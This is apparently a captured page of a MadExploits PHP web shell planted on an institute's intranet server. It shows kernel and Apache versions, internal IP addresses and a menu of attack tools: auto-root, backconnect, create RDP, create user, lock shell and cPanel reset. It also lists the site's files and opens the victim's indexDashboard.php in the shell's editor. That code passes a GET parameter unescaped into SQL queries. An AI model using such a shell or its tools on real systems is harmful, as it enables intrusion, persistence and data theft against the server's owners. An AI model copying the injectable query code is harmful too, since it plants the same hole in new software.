Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
intranetpage /
iiitdinternaldocs /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-x--x
dist
[ DIR ]
drwxr-x--x
documents
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
plugins
[ DIR ]
drwxr-x--x
DBController.php
739
B
-rwxr-x--x
categorylist.php
2.25
KB
-rwxr-x--x
common.php
2.94
KB
-rwxr-x--x
createCategory.php
3.45
KB
-rwxr-x--x
createOfficeorder.php
9.13
KB
-rwxr-x--x
dashboard.php
3.01
KB
-rwxr-x--x
dbconfig.php
1.25
KB
-rwxr-x--x
get_subcatg.php
500
B
-rwxr-x--x
index.php
3.54
KB
-rwxr-x--x
indexDashboard.php
9.81
KB
-rwxr-x--x
list.php
9.5
KB
-rwxr-x--x
list.php_07032021
10.86
KB
-rwxr-x--x
logout.php
377
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : indexDashboard.php
<?php error_reporting( 0 ); include 'DBController.php'; $db_handle = new DBController(); $categoryResult = $db_handle->runQuery( "SELECT * FROM category ORDER BY catgID ASC" ); ?> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>IIITD | Dashboard</title> <!-- Tell the browser to be responsive to screen width --> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Ionicons --> <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> <!-- DataTables --> <link rel="stylesheet" href="plugins/datatables-bs4/css/dataTables.bootstrap4.min.css"> <link rel="stylesheet" href="plugins/datatables-responsive/css/responsive.bootstrap4.min.css"> <!-- Theme style --> <link rel="stylesheet" href="css/admin.min.css"> <!-- overlayScrollbars --> <link rel="stylesheet" href="plugins/overlayScrollbars/css/OverlayScrollbars.min.css"> <!-- Stylesheet CSS --> <link rel="stylesheet" type="text/css" href="css/font-awesome/font-awesome-5/css/fontawesome-all.min.css"> <!-- Fonts---> <link href="https://fonts.googleapis.com/css2?family=Inter&display=swap" rel="stylesheet"> </head> <body class="hold-transition sidebar-mini layout-fixed"> <div class="wrapper"> <!-- Navbar --> <nav class="main-header navbar navbar-expand navbar-white navbar-light"> <!-- Left navbar links --> <ul class="navbar-nav"> <li class="nav-item"> <a class="nav-link" data-widget="pushmenu" href="#" role="button"><i class="fas fa-bars"></i></a> </li> <li class="nav-item d-none d-sm-inline-block"> <a href="#" class="nav-link">IIIT Delhi</a> </li> </ul> </nav> <!-- /.navbar --> <!-- Main Sidebar Container --> <aside class="main-sidebar sidebar-dark-primary elevation-4"> <!-- Brand Logo --> <a href="#" class="brand-link"> <img src="images/logo.png" alt="IIITD" class=""> </a> <!-- Sidebar --> <div class="sidebar"> <!-- Sidebar Menu --> <nav class="mt-2"> <ul class="nav nav-pills nav-sidebar flex-column" data-widget="treeview" role="menu" data-accordion="false"> <!-- Add icons to the links using the .nav-icon class with font-awesome or any other icon font library --> <li class="nav-item has-treeview menu-open"> <a href="#" class="nav-link active"> <i class="nav-icon fas fa-tachometer-alt"></i> <p> Dashboard </p> </a></li> <?php $catResult = $db_handle->runQuery( "SELECT * FROM category " ); foreach ( $catResult as $cResult => $cvalue ) { $catidg = $cvalue['catgID']; ?> <li class="nav-item has-treeview"> <a href="indexDashboard.php?catgIDm=<?php echo $catidg; ?>" class="nav-link"> <i class="nav-icon fas fa-copy"></i> <p> <?php echo $catResult[$cResult]['categoryName']; $catid = $catResult[$cResult]['catgID'] ?> </p> </a> </li> <?php } ?> </ul> </nav> <!-- /.sidebar-menu --> </div> <!-- /.sidebar --> </aside> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Main content --> <section class="content"> <div class="container-fluid"> <form method="POST" name="search" action="indexDashboard.php"> <div class="row"> <div class="col-md-12"> <div class="card card-primary card-outline mt-2"> <div class="card-header"> <h3 class="card-title">DASHBOARD TO IIITDELHI</h3> </div> <div class="row"> <div class="col-12"> <div class="card"> <?php if ( !empty( $_GET[ 'catgIDm' ] ) ) { $scat= $_GET[ 'catgIDm' ]; ?> <?php $result = $db_handle->runQuery( "SELECT * FROM category where catgID ='$scat' " ); } if ( !empty( $result ) ) { foreach ( $result as $key => $sdvalue ) { $catgName = $result[ $key ][ 'categoryName' ]; $resultsc = str_replace( ' ', '', $catgName ); $resultArray = preg_replace( '/[^A-Za-z0-9 ]/', '', $resultsc ); $subcategoryID = $result[ $key ][ 'catgID' ]; $catgIDm = $result[$key]['catgID'];?> <div class="card-body"> <h2> <?php echo $result[$key]['categoryName']; ?></h2> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Category Name</th> <th>Subject</th> <th>Release Date</th> <th>Makerstamp</th> <th>Download</th> </tr> </thead> <tbody> <?php $officeOrderResult = $db_handle->runQuery( "SELECT cg.*,of.* FROM category cg,officeorder of where cg.catgID = of.category and cg.catgID ='$subcategoryID'" ); //$result->execute(); foreach ( $officeOrderResult as $oResult => $value ) { ?> <tr> <td> <?php echo $value['categoryName']; ?> </td> <td> <?php echo $officeOrderResult[$oResult]['subject']; ?> </td> <td> <?php echo $officeOrderResult[$oResult]['releaseDate']; ?> </td> <td> <?php echo $officeOrderResult[$oResult]['makerstamp']; ?> </td> <td><a href="documents/<?php echo $officeOrderResult[$oResult]['fileUpload']; ?>" target="_blank">Download</a> </td> </tr> <?php } ?> </tbody> </table> </div> <?php } } else{ ?> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Category Name</th> <th>Subject</th> <th>Release Date</th> <th>Makerstamp</th> <th>Download</th> </tr> </thead> <tbody> <?php $allResult = $db_handle->runQuery( "SELECT cg.*,of.* FROM category cg,officeorder of where cg.catgID = of.category"); foreach ( $allResult as $aResult => $avalue ) { ?> <tr> <td><?php echo $allResult[$aResult]['categoryName']; ?></td> <td><?php echo $allResult[$aResult]['subject']; ?></td> <td><?php echo $allResult[$aResult]['releaseDate']; ?></td> <td><?php echo $allResult[$aResult]['makerstamp']; ?></td> <td><a href="documents/<?php echo $allResult[$aResult]['fileUpload']; ?>" target="_blank">Download</a></td> </tr> <?php } ?> </tbody> <!--<tfoot> <tr> <th>Category Name</th> <th>Subject</th> <th>Release Date</th> <th>Makerstamp</th> <th>Download</th> </tr> </tfoot> --> </table> <?php } ?> </div> </div> </div> </div> </div> </div> </form> </div> </section> <!-- Main content --> <a id="back-to-top" href="#" class="btn btn-primary back-to-top" role="button" aria-label="Scroll to top"> <i class="fas fa-chevron-up"></i> </a> </div> <!-- /.content-wrapper --> <footer class="main-footer"> Copyright © 2020, EnNoWait, All right reserved</footer> <!-- Control Sidebar --> <aside class="control-sidebar control-sidebar-dark"> <!-- Control sidebar content goes here --> </aside> <!-- /.control-sidebar --> </div> <!-- ./wrapper --> <!-- /.modal --> <!-- jQuery --> <script src="plugins/jquery/jquery.min.js"></script> <!-- jQuery UI 1.11.4 --> <script src="plugins/jquery-ui/jquery-ui.min.js"></script> <!-- Resolve conflict in jQuery UI tooltip with Bootstrap tooltip --> <script> $.widget.bridge( 'uibutton', $.ui.button ) </script> <!-- Bootstrap 4 --> <script src="plugins/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- DataTables --> <script src="plugins/datatables/jquery.dataTables.min.js"></script> <script src="plugins/datatables-bs4/js/dataTables.bootstrap4.min.js"></script> <script src="plugins/datatables-responsive/js/dataTables.responsive.min.js"></script> <script src="plugins/datatables-responsive/js/responsive.bootstrap4.min.js"></script> <script src="plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js"></script> <!-- AdminLTE App --> <script src="dist/js/adminlte.js"></script> <!-- page script --> <script> $( function () { $( "#example1" ).DataTable( { "responsive": true, "autoWidth": false, } ); $( "#example3" ).DataTable( { "responsive": true, "autoWidth": false, } ); $( '#example2' ).DataTable( { "paging": true, "lengthChange": false, "searching": false, "ordering": true, "info": true, "autoWidth": false, "responsive": true, } ); } ); </script> </body> </html>
Close